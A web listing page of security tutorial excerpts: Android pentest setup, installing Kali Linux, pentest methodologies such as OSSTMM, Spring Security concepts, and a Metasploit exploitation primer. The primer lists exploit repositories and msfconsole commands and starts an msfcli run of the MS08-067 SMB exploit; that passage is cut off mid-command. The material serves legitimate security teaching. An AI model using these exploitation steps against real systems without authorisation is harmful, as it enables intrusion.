Studio with Android SDK. It is crucial to understand how to utilize the in-built SDK tools as much as possible. This section provides an overview of some of the critical tools that we will be using when attacking an Android app during the penetration testing activity. Emulator, simulators, and real devices Sometimes, we tend to believe that all virtual emulations work in exactly the same way in real devices, which is not really the case. Especially for Android, we have multiple OEMs manufacturing multiple devices, with different chipsets running different versions of Android. It would be challenge for developers to ensure that all the functionalities for the app reflect in the same way in all devices. It is very crucial to understand the difference between an emulator, simulator, and real devices. Simulators An objective of a simulator is to simulate the state of an object, which is exactly the same state as that of an object. It is preferable that the testing happens when a mobile interacts with some of the natural behavior of the available resources. These are reimplementations of the original software applications that are written, and they are difficult to debug and are mostly writing in high-level languages. Emulators Emulators predominantly aim at replicating the closest possible behavior of mobile devices. These are typically used to test a mobile's behavior internally, such as hardware, software, and firmware updates. These are typically written in machine-level languages and are easy to debug. This is again the reimplementation of the real software. Pros Fast, simple, and little or no price associated Emulators/simulators are quickly available to test the majority of the functionality of the app that is being developed It is very easy to find the defects using emulators and fix issues Cons The risk of false positives is increased; some of the functions or protection may actually not work on a real device. Differences in software and hardware will arise. Some of the emulators might be able to mimic the hardware. However, it may or may not work when it is actually installed on that particular hardware in reality. There's a lack of network interoperability. Since emulators are not really connected to a Wi-Fi or cellular network, it may not be possible to test network-based risks/functions. Real devices Real devices are physical devices that a user will be interacting with. There are pros and cons of real devices too. Pros Lesser false positives: Results are accurate Interoperability: All the test cases are on a live environment User experience: Real user experience when it comes to the CPU utilization, memory, and so on for a provided device Performance: Performance issues can be found quickly with real handsets Cons Costs: There are plenty of OEMs, and buying all the devices is not viable. A slowdown in development: It may not be possible to connect an IDE and than emulators. This will significantly slow down the development process. Other issues: The devices that are locally connected to the workstation will have to ensure that USB ports are open, thus opening an additional entry point. Threats A threat is something that can harm an asset that we are trying to protect. In mobile device security, a threat is a possible danger that might exploit a vulnerability to compromise and cause potential harm to a device. A threat can be defined by the motives; it can be any of the following ones: Intentional: An individual or a group with an aim to break an application and steal information Accidental: The malfunctioning of a device or an application may lead to a potential disclosure of sensitive information Others: Capabilities, circumstantial, and so on Threat agents A threat agent is used to indicate an individual or a group that can manifest a threat. Threat agents will be able to perform the following actions: Access Misuse Disclose Modify Deny access Vulnerability The security weakness within a system that might allow attackers to exploit it and break the security of the device is called a vulnerability. For example, if a mobile device is stolen and it does not have the PIN or pass code enabled, the phone is vulnerable to data theft. Risk The intersection between asset (A), threat (T), and vulnerability (V) is a risk. However, a risk can be included along with the probability (P) of the threat occurrences to provide more value to the business. Risk = A x T x V x P These terms will help us understand the real risk to a given asset. Business will be benefited only if these risks are accurately assessed. Understanding threat, vulnerability, and risk is the first step in threat modeling. For a given application, no vulnerabilities or a vulnerability with no threats is considered to be a low risk. Summary In this article, we saw that mobile devices are susceptible to attacks through various threats, which exist due to the lack of sufficient security measures that can be implemented at various stages of the development of a mobile application. It is necessary to understand how these threats are manifested and learn how to test and mitigate them effectively. Proper knowledge of the underlying architecture and the tools available for the testing of mobile applications will help developers and security testers alike in order to protect end users from attackers who may be attempting to leverage these vulnerabilities.
Read more
  • 0
  • 0
  • 8926

article-image-what-kali-linux
Packt
05 Feb 2015
1 min read
Save for later

What is Kali Linux

Packt
05 Feb 2015
1 min read
This article created by Aaron Johns, the author of Mastering Wireless Penetration Testing for Highly Secured Environments introduces Kali Linux and the steps needed to get started. Kali Linux is a security penetration testing distribution built on Debian Linux. It covers many different varieties of security tools, each of which are organized by category. Let's begin by downloading and installing Kali Linux! (For more resources related to this topic, see here.) Downloading Kali Linux Congratulations, you have now started your first hands-on experience in this article! I'm sure you are excited so let's begin! Visit http://www.kali.org/downloads/. Look under the Official Kali Linux Downloads section: In this demonstration, I will be downloading and installing Kali Linux 1.0.6 32 Bit ISO. Click on the Kali Linux 1.0.6 32 Bit ISO hyperlink to download it. Depending on your Internet connection, this may take an hour to download, so please prepare yourself ahead of time so that you do not have to wait on this download. Those who have a slow Internet connection may want to reconsider downloading from a faster source within the local area. Restrictions on downloading may apply in public locations. Please make sure you have permission to download Kali Linux before doing so. Installing Kali Linux in VMware Player Once you have finished downloading Kali Linux, you will want to make sure you have VMware Player installed. VMware Player is where you will be installing Kali Linux. If you are not familiar with VMware Player, it is simply a type of virtualization software that emulates an operating system without requiring another physical system. You can create multiple operating systems and run them simultaneously. Perform the following steps: Let's start off by opening VMware Player from your desktop: VMware Player should open and display a graphical user interface: Click on Create a New Virtual Machine on the right: Select I will install the operating system later and click on Next. Select Linux and then Debian 7 from the drop-down menu: Click on Next to continue. Type Kali Linux for the virtual machine name. Browse for the Kali Linux ISO file that was downloaded earlier then click on Next. Change the disk size from 25 GB to 50 GB and then click on Next: Click on Finish: Kali Linux should now be displaying in your VMware Player library. From here, you can click on Customize Hardware... to increase the RAM or hard disk space, or change the network adapters according to your system's hardware. Click on Play virtual machine: Click on Player at the top-left and then navigate to Removable Devices | CD/DVD IDE | Settings…: Check the box next to Connected, Select Use ISO image file, browse for the Kali Linux ISO, then click on OK. Click on Restart VM at the bottom of the screen or click on Player, then navigate to Power | Restart Guest; the following screen appears: After restarting the virtual machine, you should see the following: Select Live (686-pae) then press Enter It should boot into Kali Linux and take you to the desktop screen: Congratulations! You have successfully installed Kali Linux. Updating Kali Linux Before we can get started with any of the demonstrations in this book, we must update Kali Linux to help keep the software package up to date. Open VMware Player from your desktop. Select Kali Linux and click on the green arrow to boot it. Once Kali Linux has booted up, open a new Terminal window. Type sudo apt-get update and press Enter: Then type sudo apt-get upgrade and press Enter: You will be prompted to specify if you want to continue. Type y and press Enter: Repeat these commands until there are no more updates: sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade Congratulations! You have successfully updated Kali Linux! Summary This was just the introduction to help prepare you before we get deeper into advanced technical demonstrations and hands-on examples. We did our first hands-on work through Kali Linux to install and update it on VMware Player. Resources for Article: Further resources on this subject: Veil-Evasion [article] Penetration Testing and Setup [article] Wireless and Mobile Hacks [article]
Read more
  • 0
  • 0
  • 8711
article-image-backtrack-4-penetration-testing-methodologies
Packt
20 Apr 2011
14 min read
Save for later

BackTrack 4: Penetration testing methodologies

Packt
20 Apr 2011
14 min read
A robust penetration testing methodology needs a roadmap. This will provide practical ideas and proven practices which should be handled with great care in order to assess the system security correctly. Let's take a look at what this methodology looks like. It will help ensure you're using BackTrack effectively and that you're tests are thorough and reliable. Penetration testing can be carried out independently or as a part of an IT security risk management process that may be incorporated into a regular development lifecycle (for example, Microsoft SDLC). It is vital to notice that the security of a product not only depends on the factors relating to the IT environment, but also relies on product specific security's best practices. This involves implementation of appropriate security requirements, performing risk analysis, threat modeling, code reviews, and operational security measurement. PenTesting is considered to be the last and most aggressive form of security assessment handled by qualified professionals with or without prior knowledge of a system under examination. It can be used to assess all the IT infrastructure components including applications, network devices, operating systems, communication medium, physical security, and human psychology. The output of penetration testing usually contains a report which is divided into several sections addressing the weaknesses found in the current state of a system following their countermeasures and recommendations. Thus, the use of a methodological process provides extensive benefits to the pentester to understand and critically analyze the integrity of current defenses during each stage of the testing process. Different types of penetration testing Although there are different types of penetration testing, the two most general approaches that are widely accepted by the industry are Black-Box and White-Box. These approaches will be discussed in the following sections. Black-box testing The black-box approach is also known as external testing. While applying this approach, the security auditor will be assessing the network infrastructure from a remote location and will not be aware of any internal technologies deployed by the concerning organization. By employing the number of real world hacker techniques and following through organized test phases, it may reveal some known and unknown set of vulnerabilities which may otherwise exist on the network. An auditor dealing with black-box testing is also known as black-hat. It is important for an auditor to understand and classify these vulnerabilities according to their level of risk (low, medium, or high). The risk in general can be measured according to the threat imposed by the vulnerability and the financial loss that would have occurred following a successful penetration. An ideal penetration tester would undermine any possible information that could lead him to compromise his target. Once the test process is completed, a report is generated with all the necessary information regarding the target security assessment, categorizing and translating the identified risks into business context. White-box testing The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for an auditor to view and critically evaluate the security vulnerabilities with minimum possible efforts. An auditor engaged with white-box testing is also known as white-hat. It does bring more value to the organization as compared to the blackbox approach in the sense that it will eliminate any internal security issues lying at the target infrastructure environment, thus, making it more tightened for malicious adversary to infiltrate from the outside. The number of steps involved in white-box testing is a bit more similar to that of black-box, except the use of the target scoping, information gathering, and identification phases can be excluded. Moreover, the white-box approach can easily be integrated into a regular development lifecycle to eradicate any possible security issues at its early stage before they get disclosed and exploited by intruders. The time and cost required to find and resolve the security vulnerabilities is comparably less than the black-box approach. The combination of both types of penetration testing provides a powerful insight for internal and external security viewpoints. This combination is known as Grey-Box testing, and the auditor engaged with gray-box testing is also known as grey-hat. The key benefit in devising and practicing a gray-box approach is a set of advantages posed by both approaches mentioned earlier. However, it does require an auditor with limited knowledge of an internal system to choose the best way to assess its overall security. On the other side, the external testing scenarios geared by the graybox approach are similar to that of the black-box approach itself, but can help in making better decisions and test choices because the auditor is informed and aware of the underlying technology. Vulnerability assessment versus penetration testing Since the exponential growth of an IT security industry, there are always an intensive number of diversities found in understanding and practicing the correct terminology for security assessment. This involves commercial grade companies and non-commercial organizations who always misinterpret the term while contracting for the specific type of security assessment. For this obvious reason, we decided to include a brief description on vulnerability assessment and differentiate its core features with penetration testing. Vulnerability assessment is a process for assessing the internal and external security controls by identifying the threats that pose serious exposure to the organizations assets. This technical infrastructure evaluation not only points the risks in the existing defenses but also recommends and prioritizes the remediation strategies. The internal vulnerability assessment provides an assurance for securing the internal systems, while the external vulnerability assessment demonstrates the security of the perimeter defenses. In both testing criteria, each asset on the network is rigorously tested against multiple attack vectors to identify unattended threats and quantify the reactive measures. Depending on the type of assessment being carried out, a unique set of testing process, tools, and techniques are followed to detect and identify vulnerabilities in the information assets in an automated fashion. This can be achieved by using an integrated vulnerability management platform that manages an up-to-date vulnerabilities database and is capable of testing different types of network devices while maintaining the integrity of configuration and change management. A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws to the system under consideration. Another major difference between both of these terms is that the penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment. However, the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. This perception of an industry, while dealing with both of these assessment types, may confuse and overlap the terms interchangeably, which is absolutely wrong. A qualified consultant always makes an exception to workout the best type of assessment based on the client's business requirement rather than misleading them from one over the other. It is also a duty of the contracting party to look into the core details of the selected security assessment program before taking any final decision. Penetration testing is an expensive service when compared to vulnerability assessment. Security testing methodologies There have been various open source methodologies introduced to address security assessment needs. Using these assessment methodologies, one can easily pass the time-critical and challenging task of assessing the system security depending on its size and complexity. Some of these methodologies focus on the technical aspect of security testing, while others focus on managerial criteria, and very few address both sides. The basic idea behind formalizing these methodologies with your assessment is to execute different types of tests step-by-step in order to judge the security of a system accurately. Therefore, we have introduced four such well-known security assessment methodologies to provide an extended view of assessing the network and application security by highlighting their key features and benefits. These include: Open Source Security Testing Methodology Manual (OSSTMM) Information Systems Security Assessment Framework (ISSAF) Open Web Application Security Project (OWASP) Top Ten Web Application Security Consortium Threat Classification (WASC-TC) All of these testing frameworks and methodologies will assist the security professionals to choose the best strategy that could fit into their client's requirements and qualify the suitable testing prototype. The first two provide general guidelines and methods adhering security testing for almost any information assets. The last two mainly deal with the assessment of an application security domain. It is, however, important to note that the security in itself is an on-going process. Any minor change in the target environment can affect the whole process of security testing and may introduce errors in the final results. Thus, before complementing any of the above testing methods, the integrity of the target environment should be assured. Additionally, adapting any single methodology does not necessarily provide a complete picture of the risk assessment process. Hence, it is left up to the security auditor to select the best strategy that can address the target testing criteria and remains consistent with its network or application environment. There are many security testing methodologies which claim to be perfect in finding all security issues, but choosing the best one still requires a careful selection process under which one can determine the accountability, cost, and effectiveness of the assessment at optimum level. Thus, determining the right assessment strategy depends on several factors, including the technical details provided about the target environment, resource availability, PenTester's knowledge, business objectives, and regulatory concerns. From a business standpoint, investing blind capital and serving unwanted resources to a security testing process can put the whole business economy in danger. Open Source Security Testing Methodology Manual (OSSTMM) The OSSTMM is a recognized international standard for security testing and analysis and is being used by many organizations in their day-to-day assessment cycle. It is purely based on scientific method which assists in quantifying the operational security and its cost requirements in concern with the business objectives. From a technical perspective, its methodology is divided into four key groups, that is, Scope, Channel, Index, and Vector. The scope defines a process of collecting information on all assets operating in the target environment. A channel determines the type of communication and interaction with these assets, which can be physical, spectrum, and communication. All of these channels depict a unique set of security components that has to be tested and verified during the assessment period. These components comprise of physical security, human psychology, data networks, wireless communication medium, and telecommunication. The index is a method which is considerably useful while classifying these target assets corresponding to their particular identifications, such as, MAC Address, and IP Address. At the end, a vector concludes the direction by which an auditor can assess and analyze each functional asset. This whole process initiates a technical roadmap towards evaluating the target environment thoroughly and is known as Audit Scope. There are different forms of security testing which have been classified under OSSTMM methodology and their organization is presented within six standard security test types: Blind: The blind testing does not require any prior knowledge about the target system. But the target is informed before the execution of an audit scope. Ethical hacking and war gaming are examples of blind type testing. This kind of testing is also widely accepted because of its ethical vision of informing a target in advance. Double blind: In double blind testing, an auditor does not require any knowledge about the target system nor is the target informed before the test execution. Black-box auditing and penetration testing are examples of double blind testing. Most of the security assessments today are carried out using this strategy, thus, putting a real challenge for auditors to select the best of breed tools and techniques in order to achieve their required goal. Gray box: In gray box testing, an auditor holds limited knowledge about the target system and the target is also informed before the test is executed. Vulnerability assessment is one of the basic examples of gray box testing. Double gray box: The double gray box testing works in a similar way to gray box testing, except the time frame for an audit is defined and there are no channels and vectors being tested. White-box audit is an example of double gray box testing. Tandem: In tandem testing, the auditor holds minimum knowledge to assess the target system and the target is also notified in advance before the test is executed. It is fairly noted that the tandem testing is conducted thoroughly. Crystal box and in-house audit are examples of tandem testing. Reversal: In reversal testing, an auditor holds full knowledge about the target system and the target will never be informed of how and when the test will be conducted. Red-teaming is an example of reversal type testing. Which OSSTMM test type follows the rules of Penetration Testing? Double blind testing The technical assessment framework provided by OSSTMM is flexible and capable of deriving certain test cases which are logically divided into five security components of three consecutive channels, as mentioned previously. These test cases generally examine the target by assessing its access control security, process security, data controls, physical location, perimeter protection, security awareness level, trust level, fraud control protection, and many other procedures. The overall testing procedures focus on what has to be tested, how it should be tested, what tactics should be applied before, during and after the test, and how to interpret and correlate the final results. Capturing the current state of protection of a target system by using security metrics is considerably useful and invaluable. Thus, the OSSTMM methodology has introduced this terminology in the form of RAV (Risk Assessment Values). The basic function of RAV is to analyze the test results and compute the actual security value based on three factors, which are operational security, loss controls, and limitations. This final security value is known as RAV Score. By using RAV score an auditor can easily extract and define the milestones based on the current security posture to accomplish better protection. From a business perspective, RAV can optimize the amount of investment required on security and may help in the justification of better available solutions. Key features and benefits Practicing the OSSTMM methodology substantially reduces the occurrence of false negatives and false positives and provides accurate measurement for the security. Its framework is adaptable to many types of security tests, such as penetration testing, white-box audit, vulnerability assessment, and so forth. It ensures the assessment should be carried out thoroughly and that of the results can be aggregated into consistent, quantifiable, and reliable manner. The methodology itself follows a process of four individually connected phases, namely definition phase, information phase, regulatory phase, and controls test phase. Each of which obtain, assess, and verify the information regarding the target environment. Evaluating security metrics can be achieved using the RAV method. The RAV calculates the actual security value based on operational security, loss controls, and limitations. The given output known as the RAV score represents the current state of target security. Formalizing the assessment report using the Security Test Audit Report (STAR) template can be advantageous to management, as well as the technical team to review the testing objectives, risk assessment values, and the output from each test phase. The methodology is regularly updated with new trends of security testing, regulations, and ethical concerns. The OSSTMM process can easily be coordinated with industry regulations, business policy, and government legislations. Additionally, a certified audit can also be eligible for accreditation from ISECOM (Institute for Security and Open Methodologies) directly.
Read more
  • 0
  • 0
  • 8621

article-image-understanding-big-picture
Packt
04 Sep 2013
7 min read
Save for later

Understanding the big picture

Packt
04 Sep 2013
7 min read
(For more resources related to this topic, see here.) So we've got this thing for authentication and authorization. Let's see who is responsible and what for. There is an AccessDecisionManager, which, as the name suggests, is responsible for deciding whether we can access something or not; if not, an AccessDeniedException or InsufficientAuthenticationException is thrown. AuthenticationManager is another crucial interface. It is responsible for confirming who we are. Both are just interfaces, so we can swap our own implementations if we like. In a web application, the job of talking with these two components and the user is handled by a web filter called DelegatingFilterProxy, which is decomposed into several small filters. Each one is responsible for a different thing, so we can turn them on, off, or put our own filters in between and mess with them anyway we like. These are quite important, and we will dig into them later. For the big picture, all we need to know is that these filters take care of all the talking, redirect the user to the login page (or an access-denied page), and save the current user details in an HTTPSession. Well, the last part, while true, is a bit misleading. User details are kept in a SecurityContext object, which we can get a hold of by calling SecurityContextHolder.getContext(), and which in the end is stored in HTTPSession by our filters. But we had promised a big picture, not the gory details, so here it is: Quite simple, right? If we have an authentication protocol without login and password, it works in a similar way. We just switch one of the filters, or the authentication manager, to a different implementation. If we don't have a web application, we just need to do the talking ourselves. But this is all for web resources (URLs). What is much more interesting and useful is securing calls to methods. It looks, for example, like this: @PreAuthorize(["isAuthenticated() and hasRole('ROLE_ADMIN')"])public void somethingOnlyAdminCanDo() {} Here, we decided that somethingOnlyAdminCanDo will be protected by our AccessDecisionManager and that the user must be authenticated (not anonymous) and has to have an admin role. Can a user be anonymous and have an admin role at the same time? In theory, yes, but it would not make any sense. Because it's much cheaper to check if he is authenticated and stop right there. We see a bit of optimization in here. We could drop the isAuthenticated() method and the behavior wouldn't change. We can put this kind of annotation on any Java method, but our configuration and mechanism to fire up the security will depend on the type of objects we are trying to protect. For objects declared as Spring beans (which is a short name for anything defined in our Inversion of Control (IoC) configuration, either via XML or annotations), we don't need to do much. Spring will just create proxies (dynamic classes) that take over calls to our secured methods and fire up AccessDecisionManager before passing the call to the object we really wanted to call. For objects outside of the IoC container (anything created with new or just code not defined in Spring context), we can use the power of Aspect Oriented Programming (AOP) to get the same effect. If you don't know what AOP is, don't worry. It's just a bit of magic at the classloader and bytecode level. For now, the only important thing is that it works basically in the same way. This is depicted as follows: We can do much more than this, as we'll see next, but these are the basics. So, how does the AccessDecisionManager decide whether we can access something or not? Imagine a council of very old Jedi masters sitting around a fire. They decide whether or not you are permitted to call a secured method or access a web resource. Each of these masters makes a decision or abstains. Each of them can consult additional information (not only who you are and what you want to do, but every aspect of the situation). In Spring Security, those smart people are called AccessDecisionVoters, and each of them has one vote. The council can be organized in many different ways. It has one voice, and so it may make the decision based on a majority of votes. It may be veto-based, where everything is allowed unless someone disagrees. Or it may need everyone to agree to grant access, otherwise access is denied. The council is the AccessDecisionManager, and we have three implementations previously mentioned out of the box. We can also decide who's in the council and who is not. This is probably the most important decision we can make, because this will decide the security model that we will use in our application. Let's talk about the most popular counselors (implementations of AccessDecisionVoter). Model based on roles (RoleVoter): This guy makes his decision based on the role of the user and the required role for the resource/method. So if we write @PreAuthorize("hasRole('ROLE_ADMIN')"), you better be a damn admin or you'll get a no-no from this guy. Model based on entity access control permissions (AclEntryVoter): This guy doesn't worry about roles. He is much more than that. Acl stands for Access Control List, which represents a list of permissions. Every user has a list of permissions, possibly for every domain object (usually an object in the database), that you want to secure. So, for example, if we have a bank application, the supervisor can give Frank access to a single specific customer (say, ACME—A Company that Makes Everything), which is represented as an entity in the database and as an object in our system. No other employee will be able to do anything to that customer unless the supervisor grants that person the same permission as Frank. This is probably the most scrutinous voter we would ever use. Our customer can have a very detailed configuration with him/her. On the other hand, this is also the most cumbersome, as we need to create a usable graphical interface to set permissions for every user and every domain object. While we have done this a few times, most of our customers wanted a simpler approach, and even those who started with a graphical user interface to configure everything asked for a simplified version based on business rules, at the end of the project. If your customer describes his security needs in terms of rules such as "Frank can edit every customer he has created but he cannot do anything other than view other customers", it means it's time for PreInvocationAuthorizationAdviceVoter. Business rules model (PreInvocationAuthorizationAdviceVoter): This is usually used when you want to implement static business rules in the application. This goes like "if I've written a blog post, I can change it later, but others can only comment" and "if a friend asked me to help him write the blog post, I can do that, because I'm his friend". Most of these things are also possible to implement with ACLs, but would be very cumbersome. This is our favorite voter. With it, it's very easy to write, test, and change the security restrictions, because instead of writing every possible relation in the database (as with ACL voter) or having only dumb roles, we write our security logic in plain old Java classes. Great stuff and most useful, once you see how it works. Did we mention that this is a council? Yes we did. The result of this is that we can mix any voters we want and choose any council organization we like. We can have all three voters previously mentioned and allow access if any of them says "yes". There are even more voters. And we can write new ones ourselves. Do you feel the power of the Jedi council already? Do you feel the power of the Jedi council already? Summary This section provides an overview of authentication and authorization, which are the principles of Spring security. Resources for Article : Further resources on this subject: Migration to Spring Security 3 [Article] Getting Started with Spring Security [Article] So, what is Spring for Android? [Article]
Read more
  • 0
  • 0
  • 8546

article-image-target-exploitation
Packt
14 Mar 2014
14 min read
Save for later

Target Exploitation

Packt
14 Mar 2014
14 min read
(For more resources related to this topic, see here.) Vulnerability research Understanding the capabilities of a specific software or hardware product may provide a starting point for investigating vulnerabilities that could exist in that product. Conducting vulnerability research is not easy, neither is it a one-click task. Thus, it requires a strong knowledge base with different factors to carry out security analysis. The following are the factors to carry out security analysis: Programming skills: This is a fundamental factor for ethical hackers. Learning the basic concepts and structures that exist with any programming language should grant the tester with an imperative advantage of finding vulnerabilities. Apart from the basic knowledge of programming languages, you must be prepared to deal with the advanced concepts of processors, system memory, buffers, pointers, data types, registers, and cache. These concepts are implementable in almost any programming language such as C/C++, Python, Perl, and Assembly. To learn the basics of writing an exploit code from a discovered vulnerability, please visit http://www.phreedom.org/presentations/exploit-code-development/. Reverse engineering: This is another wide area for discovering the vulnerabilities that could exist in the electronic device, software, or system by analyzing its functions, structures, and operations. The purpose is to deduce a code from a given system without any prior knowledge of its internal working, to examine it for error conditions, poorly designed functions, and protocols, and to test the boundary conditions. There are several reasons that inspire the practice of reverse engineering skills such as the removal of copyright protection from a software, security auditing, competitive technical intelligence, identification of patent infringement, interoperability, understanding the product workflow, and acquiring the sensitive data. Reverse engineering adds two layers of concept to examine the code of an application: source code auditing and binary auditing. If you have access to the application source code, you can accomplish the security analysis through automated tools or manually study the source in order to extract the conditions where vulnerability can be triggered. On the other hand, binary auditing simplifies the task of reverse engineering where the application exists without any source code. Disassemblers and decompilers are two generic types of tools that may assist the auditor with binary analysis. Disassemblers generate the assembly code from a complied binary program, while decompilers generate a high-level language code from a compiled binary program. However, dealing with either of these tools is quite challenging and requires a careful assessment. Instrumented tools: Instrumented tools such as debuggers, data extractors, fuzzers, profilers, code coverage, flow analyzers, and memory monitors play an important role in the vulnerability discovery process and provide a consistent environment for testing purposes. Explaining each of these tool categories is out of the scope of this book. However, you may find several useful tools already present under Kali Linux. To keep a track of the latest reverse code engineering tools, we strongly recommend that you visit the online library at http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools. Exploitability and payload construction: This is the final step in writing the proof-of-concept (PoC) code for a vulnerable element of an application, which could allow the penetration tester to execute custom commands on the target machine. We apply our knowledge of vulnerable applications from the reverse engineering stage to polish shellcode with an encoding mechanism in order to avoid bad characters that may result in the termination of the exploit process. Depending on the type and classification of vulnerability discovered, it is very significant to follow the specific strategy that may allow you to execute an arbitrary code or command on the target system. As a professional penetration tester, you may always be looking for loopholes that should result in getting a shell access to your target operating system. Thus, we will demonstrate a few scenarios with the Metasploit framework, which will show these tools and techniques. Vulnerability and exploit repositories For many years, a number of vulnerabilities have been reported in the public domain. Some of these were disclosed with the PoC exploit code to prove the feasibility and viability of a vulnerability found in the specific software or application. And, many still remain unaddressed. This competitive era of finding the publicly available exploits and vulnerability information makes it easier for penetration testers to quickly search and retrieve the best available exploit that may suit their target system environment. You can also port one type of exploit to another type (for example, Win32 architecture to Linux architecture) provided that you hold intermediate programming skills and a clear understanding of OS-specific architecture. We have provided a combined set of online repositories that may help you to track down any vulnerability information or its exploit by searching through them. Not every single vulnerability found has been disclosed to the public on the Internet. Some are reported without any PoC exploit code, and some do not even provide detailed vulnerability information. For this reason, consulting more than one online resource is a proven practice among many security auditors. The following is a list of online repositories: Repository name Website URL Bugtraq SecurityFocus http://www.securityfocus.com OSVDB Vulnerabilities http://osvdb.org Packet Storm http://www.packetstormsecurity.org VUPEN Security http://www.vupen.com National Vulnerability Database http://nvd.nist.gov ISS X-Force http://xforce.iss.net US-CERT Vulnerability Notes http://www.kb.cert.org/vuls US-CERT Alerts http://www.us-cert.gov/cas/techalerts/ SecuriTeam http://www.securiteam.com Government Security Org http://www.governmentsecurity.org Secunia Advisories http://secunia.com/advisories/historic/ Security Reason http://securityreason.com XSSed XSS-Vulnerabilities http://www.xssed.com Security Vulnerabilities Database http://securityvulns.com SEBUG http://www.sebug.net BugReport http://www.bugreport.ir MediaService Lab http://lab.mediaservice.net Intelligent Exploit Aggregation Network http://www.intelligentexploit.com Hack0wn http://www.hack0wn.com Although there are many other Internet resources available, we have listed only a few reviewed ones. Kali Linux comes with an integration of exploit database from Offensive Security. This provides an extra advantage of keeping all archived exploits to date on your system for future reference and use. To access Exploit-DB, execute the following commands on your shell: # cd /usr/share/exploitdb/ # vim files.csv This will open a complete list of exploits currently available from Exploit-DB under the /pentest/exploits/exploitdb/platforms/ directory. These exploits are categorized in their relevant subdirectories based on the type of system (Windows, Linux, HP-UX, Novell, Solaris, BSD, IRIX, TRU64, ASP, PHP, and so on). Most of these exploits were developed using C, Perl, Python, Ruby, PHP, and other programming technologies. Kali Linux already comes with a handful set of compilers and interpreters that support the execution of these exploits. How to extract particular information from the exploits list? Using the power of bash commands, you can manipulate the output of any text file in order to retrieve the meaningful data. You can either use searchsploit, or this can also be accomplished by typing cat files.csv |grep '"' |cut -d";" -f3 on your console. It will extract the list of exploit titles from a files.csv file. To learn the basic shell commands, please refer to http://tldp.org/LDP/abs/html/index.html. Advanced exploitation toolkit Kali Linux is preloaded with some of the best and most advanced exploitation toolkits. The Metasploit framework (http://www.metasploit.com) is one of these. We have explained it in a greater detail and presented a number of scenarios that would effectively increase the productivity and enhance your experience with penetration testing. The framework was developed in the Ruby programming language and supports modularization such that it makes it easier for the penetration tester with optimum programming skills to extend or develop custom plugins and tools. The architecture of a framework is divided into three broad categories: libraries, interfaces, and modules. A key part of our exercises is to focus on the capabilities of various interfaces and modules. Interfaces (console, CLI, web, and GUI) basically provide the front-end operational activity when dealing with any type of modules (exploits, payloads, auxiliaries, encoders, and NOP). Each of the following modules have their own meaning and are function-specific to the penetration testing process. Exploit: This module is the proof-of-concept code developed to take advantage of a particular vulnerability in a target system Payload: This module is a malicious code intended as a part of an exploit or independently compiled to run the arbitrary commands on the target system Auxiliaries: These modules are the set of tools developed to perform scanning, sniffing, wardialing, fingerprinting, and other security assessment tasks Encoders: These modules are provided to evade the detection of antivirus, firewall, IDS/IPS, and other similar malware defenses by encoding the payload during a penetration operation No Operation or No Operation Performed (NOP): This module is an assembly language instruction often added into a shellcode to perform nothing but to cover a consistent payload space For your understanding, we have explained the basic use of two well-known Metasploit interfaces with their relevant command-line options. Each interface has its own strengths and weaknesses. However, we strongly recommend that you stick to a console version as it supports most of the framework features. MSFConsole MSFConsole is one of the most efficient, powerful, and all-in-one centralized front-end interface for penetration testers to make the best use of the exploitation framework. To access msfconsole, navigate to Applications | Kali Linux | Exploitation Tools | Metasploit | Metasploit framework or use the terminal to execute the following command: # msfconsole You will be dropped into an interactive console interface. To learn about all the available commands, you can type the following command: msf > help This will display two sets of commands; one set will be widely used across the framework, and the other will be specific to the database backend where the assessment parameters and results are stored. Instructions about other usage options can be retrieved through the use of -h, following the core command. Let us examine the use of the show command as follows: msf > show -h [*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, options [*] Additional module-specific parameters are: advanced, evasion, targets, actions This command is typically used to display the available modules of a given type or all of the modules. The most frequently used commands could be any of the following: show auxiliary: This command will display all the auxiliary modules show exploits: This command will get a list of all the exploits within the framework show payloads: This command will retrieve a list of payloads for all platforms. However, using the same command in the context of a chosen exploit will display only compatible payloads. For instance, Windows payloads will only be displayed with the Windows-compatible exploits show encoders: This command will print the list of available encoders show nops: This command will display all the available NOP generators show options: This command will display the settings and options available for the specific module show targets: This command will help us to extract a list of target OS supported by a particular exploit module show advanced: This command will provide you with more options to fine-tune your exploit execution We have compiled a short list of the most valuable commands in the following table; you can practice each one of them with the Metasploit console. The italicized terms next to the commands will need to be provided by you: Commands Description check To verify a particular exploit against your vulnerable target without exploiting it. This command is not supported by many exploits. connect ip port Works similar to that of Netcat and Telnet tools. exploit To launch a selected exploit. run To launch a selected auxiliary. jobs Lists all the background modules currently running and provides the ability to terminate them. route add subnet netmask sessionid To add a route for the traffic through a compromised session for network pivoting purposes. info module Displays detailed information about a particular module (exploit, auxiliary, and so on). set param value To configure the parameter value within a current module. setg param value To set the parameter value globally across the framework to be used by all exploits and auxiliary modules. unset param It is a reverse of the set command. You can also reset all variables by using the unset all command at once. unsetg param To unset one or more global variables. sessions Ability to display, interact, and terminate the target sessions. Use with -l for listing, -i ID for interaction, and -k ID for termination. search string Provides a search facility through module names and descriptions. use module Select a particular module in the context of penetration testing. It is important for you to understand their basic use with different sets of modules within the framework. MSFCLI Similar to the MSFConsole interface, a command-line interface (CLI) provides an extensive coverage of various modules that can be launched at any one instance. However, it lacks some of the advanced automation features of MSFConsole. To access msfcli, use the terminal to execute the following command: # msfcli -h This will display all the available modes similar to that of MSFConsole as well as usage instructions for selecting the particular module and setting its parameters. Note that all the variables or parameters should follow the convention of param=value and that all options are case-sensitive. We have presented a small exercise to select and execute a particular exploit as follows: # msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree...      Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST                     yes       The target address    RPORT    445              yes       Set the SMB service port    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) The use of O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter: # msfcli windows/smb/ms08_067_netapi 